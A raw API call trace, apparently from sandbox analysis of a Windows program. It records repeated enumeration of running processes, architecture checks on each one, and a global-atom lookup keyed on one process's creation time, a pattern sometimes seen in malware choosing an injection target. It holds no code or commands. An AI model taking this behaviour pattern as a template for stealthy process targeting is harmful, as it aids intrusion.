	[0089.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0089.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0089.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0089.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0089.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0089.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0089.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0089.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0089.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0089.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0089.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0089.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0089.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0089.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0089.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0089.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0089.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0089.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0089.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0089.052] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.052] CloseHandle (hObject=0x20c) returned 1
	[0089.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0089.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0089.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0089.053] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.053] CloseHandle (hObject=0x20c) returned 1
	[0089.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0089.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0089.053] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.053] CloseHandle (hObject=0x20c) returned 1
	[0089.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0089.053] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.053] CloseHandle (hObject=0x20c) returned 1
	[0089.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0089.053] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.053] CloseHandle (hObject=0x20c) returned 1
	[0089.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0089.053] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.053] CloseHandle (hObject=0x20c) returned 1
	[0089.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0089.053] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.053] CloseHandle (hObject=0x20c) returned 1
	[0089.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0089.054] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.054] CloseHandle (hObject=0x20c) returned 1
	[0089.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0089.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0089.054] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.054] CloseHandle (hObject=0x20c) returned 1
	[0089.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0089.054] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.059] CloseHandle (hObject=0x20c) returned 1
	[0089.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0089.059] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.059] CloseHandle (hObject=0x20c) returned 1
	[0089.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0089.059] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.059] CloseHandle (hObject=0x20c) returned 1
	[0089.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0089.059] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.059] CloseHandle (hObject=0x20c) returned 1
	[0089.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0089.059] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.060] CloseHandle (hObject=0x20c) returned 1
	[0089.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0089.060] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.060] CloseHandle (hObject=0x20c) returned 1
	[0089.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0089.060] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.060] CloseHandle (hObject=0x20c) returned 1
	[0089.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0089.060] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.060] CloseHandle (hObject=0x20c) returned 1
	[0089.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0089.060] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.060] CloseHandle (hObject=0x20c) returned 1
	[0089.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0089.060] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.060] CloseHandle (hObject=0x20c) returned 1
	[0089.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0089.061] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.061] CloseHandle (hObject=0x20c) returned 1
	[0089.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0089.061] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.061] CloseHandle (hObject=0x20c) returned 1
	[0089.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0089.061] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.061] CloseHandle (hObject=0x20c) returned 1
	[0089.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0089.061] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.061] CloseHandle (hObject=0x20c) returned 1
	[0089.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0089.061] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.061] CloseHandle (hObject=0x20c) returned 1
	[0089.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0089.061] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.061] CloseHandle (hObject=0x20c) returned 1
	[0089.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0089.062] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.062] CloseHandle (hObject=0x20c) returned 1
	[0089.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0089.062] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.062] CloseHandle (hObject=0x20c) returned 1
	[0089.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0089.062] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.062] CloseHandle (hObject=0x20c) returned 1
	[0089.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0089.062] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.062] CloseHandle (hObject=0x20c) returned 1
	[0089.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0089.062] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.062] CloseHandle (hObject=0x20c) returned 1
	[0089.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.063] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.063] CloseHandle (hObject=0x20c) returned 1
	[0089.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.063] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.063] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0089.063] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0089.063] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0089.064] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.064] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0089.064] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.064] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0089.064] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0089.064] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0089.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0089.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0089.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0089.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0089.064] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.065] CloseHandle (hObject=0x20c) returned 1
	[0089.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0089.065] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.065] CloseHandle (hObject=0x20c) returned 1
	[0089.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0089.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0089.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0089.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0089.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0089.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0089.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0089.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0089.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0089.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0089.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0089.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0089.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0089.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0089.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0089.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0089.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0089.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0089.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0089.147] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.147] CloseHandle (hObject=0x20c) returned 1
	[0089.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0089.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0089.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0089.147] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.147] CloseHandle (hObject=0x20c) returned 1
	[0089.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0089.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0089.147] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.147] CloseHandle (hObject=0x20c) returned 1
	[0089.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0089.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.148] CloseHandle (hObject=0x20c) returned 1
	[0089.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0089.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.148] CloseHandle (hObject=0x20c) returned 1
	[0089.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0089.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.148] CloseHandle (hObject=0x20c) returned 1
	[0089.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0089.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.148] CloseHandle (hObject=0x20c) returned 1
	[0089.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0089.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.148] CloseHandle (hObject=0x20c) returned 1
	[0089.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0089.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0089.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.149] CloseHandle (hObject=0x20c) returned 1
	[0089.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0089.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.149] CloseHandle (hObject=0x20c) returned 1
	[0089.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0089.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.149] CloseHandle (hObject=0x20c) returned 1
	[0089.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0089.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.149] CloseHandle (hObject=0x20c) returned 1
	[0089.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0089.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.149] CloseHandle (hObject=0x20c) returned 1
	[0089.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0089.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.149] CloseHandle (hObject=0x20c) returned 1
	[0089.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0089.150] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.150] CloseHandle (hObject=0x20c) returned 1
	[0089.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0089.150] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.150] CloseHandle (hObject=0x20c) returned 1
	[0089.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0089.150] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.150] CloseHandle (hObject=0x20c) returned 1
	[0089.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0089.150] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.150] CloseHandle (hObject=0x20c) returned 1
	[0089.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0089.150] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.150] CloseHandle (hObject=0x20c) returned 1
	[0089.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0089.150] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.151] CloseHandle (hObject=0x20c) returned 1
	[0089.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0089.151] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.151] CloseHandle (hObject=0x20c) returned 1
	[0089.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0089.151] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.151] CloseHandle (hObject=0x20c) returned 1
	[0089.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0089.151] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.151] CloseHandle (hObject=0x20c) returned 1
	[0089.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0089.151] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.151] CloseHandle (hObject=0x20c) returned 1
	[0089.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0089.151] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.151] CloseHandle (hObject=0x20c) returned 1
	[0089.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0089.152] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.152] CloseHandle (hObject=0x20c) returned 1
	[0089.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0089.152] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.152] CloseHandle (hObject=0x20c) returned 1
	[0089.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0089.152] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.152] CloseHandle (hObject=0x20c) returned 1
	[0089.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0089.152] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.152] CloseHandle (hObject=0x20c) returned 1
	[0089.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0089.152] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.152] CloseHandle (hObject=0x20c) returned 1
	[0089.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.153] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.153] CloseHandle (hObject=0x20c) returned 1
	[0089.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.153] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.153] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0089.153] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0089.153] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0089.153] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.154] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0089.154] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.154] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0089.154] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0089.154] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0089.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0089.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0089.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0089.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0089.154] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.154] CloseHandle (hObject=0x20c) returned 1
	[0089.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0089.155] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.155] CloseHandle (hObject=0x20c) returned 1
	[0089.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0089.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0089.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0089.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0089.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0089.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0089.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0089.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0089.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0089.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0089.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0089.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0089.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0089.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0089.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0089.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0089.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
